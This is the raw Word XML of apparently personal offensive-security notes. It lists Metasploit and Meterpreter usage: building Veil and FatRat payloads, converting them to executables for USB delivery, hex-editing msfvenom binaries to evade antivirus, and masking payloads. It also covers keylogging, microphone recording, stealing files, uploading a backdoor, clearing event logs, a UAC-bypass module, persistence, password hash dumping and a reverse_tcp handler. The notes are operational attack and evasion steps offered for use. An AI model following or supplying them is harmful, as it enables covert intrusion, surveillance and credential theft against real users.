    <w:p w14:paraId="6FA7D48E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> : run after </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>explotation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to see what you can access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14924B0B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>veil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B55976C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>root user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9EED71" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>change all .bat files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4507CE69" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>How to go about it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57865B20" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- open veil // choose what you want</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862B151" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- copy down Source code written to: /var/lib/veil/output/source/powerpayload.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D395055" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- cd ~/Desktop/B2E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACBB9E5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- use wine to open bat to converter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A79168" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> wine Bat_To_Exe_Converter_(Installer).exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B822F80" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- open source code in B2E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6530EB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- save &amp; convert the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41128508" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- copy to USB and transfer file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E865FB1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="0411F6B3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>fatrat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4031EBFF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>MUST BE ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56376D9A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2774903A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To make a payload undetectable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCDCE66" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>1. Code it yourself</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73E3EB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>2. choose your payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB5F13" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>3. change your binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117B384B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">ex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hexeditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> xNew.exe (from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2B474C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>DONT CHANGE BINARY YOU DONT KNOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B1555" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- Can change a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E5F35" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>to see any hash change us md5sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A73B83" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6AA2E076" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Masking a payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A00D6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>making a payload look like something else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4ECFC9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="5C8614C7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Things you can do with Meterpreter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED8106E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-background or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: exits but doesn't close session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB0248" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>guid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: gets session UID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75937871" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: tells us which user we are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358083A8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> &amp; ls: list all files in a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E47A092" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-download: downloads files off target machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE7C107" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-Ex. download pasword.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E50808" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-upload: uploads file to host machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71D041" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-Ex. upload /home/gdsj05/Desktop/RatBackDoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F340B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-rm: removes files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C4917" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rmdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">: removes directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DCA895" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-execute: runs any type of command that I want in a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C42EF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-kill: terminates a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>proccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36E08665" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: list out all files currently running on target system // left hand side gives PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9093AD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-Ex. kill 7356</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E3C85" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">: gets </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>inforomation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> on target machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E4B100" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">-mouse: allows us to send </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>mounse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467426A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-Ex. mouse move 640 480</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786BA82F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">: starts keyboard logger </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FFE72" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>keyscan_dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">: shows all logs of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>keyscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4771407E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>keyscan_stop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: stops keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC3FCE2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>record_mic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: as it says</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC96583" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>record_mic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -d 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C480C4A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430C211D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>-search -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435F3226" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>clearev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>: similar to covering up our tracks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3613A2C3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2A57ED34" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A33BFFB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>use exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bypassuac_fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E58BCB9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to elevate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4CFC6B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">THIS ONLY WORKS IF SYSTEM IS COMPROMISED INITIALLY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C6E68" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="29A48E4F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Privilege Escalation 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4305C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Best resource for Priv Esc starters is: https://gtfobins.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF01416" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- If you ever run into any issues make sure to visit the website!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F6197" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="458FB047" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>persistance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346A6624" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- works even through resets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD3E74" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>persistence_service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72B1DE00" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2C9E9B90" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>post/windows/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BC2BD00" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- allows you to gather passwords hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D99319" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2DED07B7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>MULIT/HANDLER Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DC4F4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>PAYLOAD SETTINGS ARE windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> // and if needed windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3789BDCD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="3A43305F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>MyOwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Python Exploitation Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3909E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">socket allows us to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>iniatiate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> connection between 2 machines </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EFCAA7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="413E268F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>How to download something without physically accessing Target Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085A1724" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> service apache2 start // starts web page and everything in the below directory will show</w:t>
      </w:r>
    </w:p>
